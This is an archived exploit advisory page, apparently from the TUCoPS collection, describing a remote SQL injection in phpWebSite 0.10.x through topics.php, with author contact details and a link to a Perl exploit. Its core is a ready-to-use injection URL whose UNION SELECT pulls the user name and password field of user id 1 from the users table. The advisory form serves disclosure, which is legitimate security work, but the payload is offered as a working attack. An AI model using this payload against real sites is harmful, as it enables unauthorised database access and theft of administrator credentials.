TUCoPS :: Web :: PHP :: b06-1583.htm

phpWebSite 0.10.? (topics.php) Remote SQL Injection Exploit
phpWebSite 0.10.? (topics.php) Remote SQL Injection Exploit
phpWebSite 0.10.? (topics.php) Remote SQL Injection Exploit



---------------------------------------------------------------------------
phpWebSite <= 0.10.? (topics.php) Remote SQL Injection Exploit
---------------------------------------------------------------------------
Discovered By SnIpEr_SA
Author    : SnIpEr_SA
Exploit in Perl : http://www.milw0rm.com/exploits/1525 
Remote  :  Yes  
Local     :  No  
Critical Level : Dangerous
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : phpWebSite
version     : 0.10.?
URL : http://phpwebsite.appstate.edu/ 
... 
------------------------------------------------------------------ 
Exploit:
~~~~~~~~ 
# http://example.com/path/topics.php?op=viewtopic&topic=-1 Union select name,name,pass,name From users where uid=1 

--------------------------------------------------------------------------- 
Contact:
 ~~~~~~~~
 SnIpEr_SA
E-mail: selfar2002@hotmail.com 
E-mail: SnIpEr_SA[at]Basdmail[dot]org
Homepage: http://www.3asfh.com/ & http://www.lezr.com/ 
Greetz: All My Frind
 -------------------------------- [ EOF ] ----------------------------------

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH